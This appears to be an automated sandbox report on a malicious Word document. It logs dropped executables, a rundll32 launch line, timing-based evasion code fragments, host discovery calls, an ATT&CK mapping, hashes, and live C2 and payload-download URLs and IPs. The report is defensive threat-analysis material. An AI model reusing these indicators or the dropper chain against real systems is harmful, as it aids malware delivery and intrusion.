    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc
    Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Command and Scripting Interpreter
    Path Interception111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium2
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts12
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools
    LSASS Memory22
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Native API
    Logon Script (Windows)Logon Script (Windows)111
    Process Injection
    Security Account Manager1
    Account Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local Accounts33
    Exploitation for Client Execution
    Logon Script (Mac)Logon Script (Mac)12
    Scripting
    NTDS1
    System Owner/User Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer123
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets1
    Remote System Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Rundll32
    Cached Domain Credentials1
    System Network Configuration Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    File and Directory Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    courtesyautomotivedoc08.11.doc27%VirustotalBrowse
    courtesyautomotivedoc08.11.doc18%ReversingLabsScript-Macro.Trojan.Amphitryon
    courtesyautomotivedoc08.11.doc100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll100%AviraHEUR/AGEN.1251556
    C:\Users\user\AppData\Local\Temp\y875E.tmp.dll100%AviraHEUR/AGEN.1251556
    C:\Users\user\AppData\Local\Temp\~DF612CB1A14F491B4E.TMP100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\r9093.tmp.exe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\r9093.tmp.exe0%ReversingLabs
    SourceDetectionScannerLabelLinkDownload
    5.2.rundll32.exe.7fef7530000.2.unpack100%AviraHEUR/AGEN.1251556Download File
    5.2.rundll32.exe.180000000.1.unpack100%AviraHEUR/AGEN.1205098Download File
    SourceDetectionScannerLabelLink
    alexbionka.com2%VirustotalBrowse
    SourceDetectionScannerLabelLink
    alexbionka.com2%VirustotalBrowse
    alexbionka.com0%Avira URL Cloudsafe
    http://alexbionka.com/2%VirustotalBrowse
    http://alexbionka.com/0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c0%Avira URL Cloudsafe
    http://45.8.1460%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Zf0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    alexbionka.com
    64.227.108.27
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    alexbionka.comtrue
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://alexbionka.com/true
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dllfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_cr9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://45.8.146rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    low
    http://45.8.146.139/fhfty/A2-7QTSJAH4Zfr9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_nrundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    45.8.146.139
    unknownRussian Federation
    44676VMAGE-ASRUfalse
    64.227.108.27
    alexbionka.comUnited States
    14061DIGITALOCEAN-ASNUStrue
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682567
    Start date and time:2022-08-11 17:37:25 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 58s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:courtesyautomotivedoc08.11.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winDOC@5/14@2/2
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 80% (good quality ratio 61.6%)
    • Quality average: 58.3%
    • Quality standard deviation: 38.9%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe
    • TCP Packets have been reduced to 100
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    TimeTypeDescription
    17:38:35API Interceptor1x Sleep call for process: rundll32.exe modified
    No context
    No context
    No context
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:downloaded
    Size (bytes):360448
    Entropy (8bit):4.669486804663653
    Encrypted:false
    SSDEEP:6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
    MD5:CE600629752CAF6529025A0EE60FB7B3
    SHA1:8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
    SHA-256:BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
    SHA-512:4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
    Malicious:true
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    IE Cache URL:http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):113730
    Entropy (8bit):7.990292786537194
    Encrypted:true
    SSDEEP:3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
    MD5:E0B30095BE35E9494E5073277D4FC1A1
    SHA1:19D39B036989A331F5389E377FBE565436599894
    SHA-256:EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
    SHA-512:A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR...|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,.*.....c...;.B...q..1.>|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.....*..oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......|.z..L.....\.FP.....QG...0.....2...@T.*....C.....M...;...i....Y8...R.Y*....~.;.CA........q....6`......~......2.g."...../..{x.( 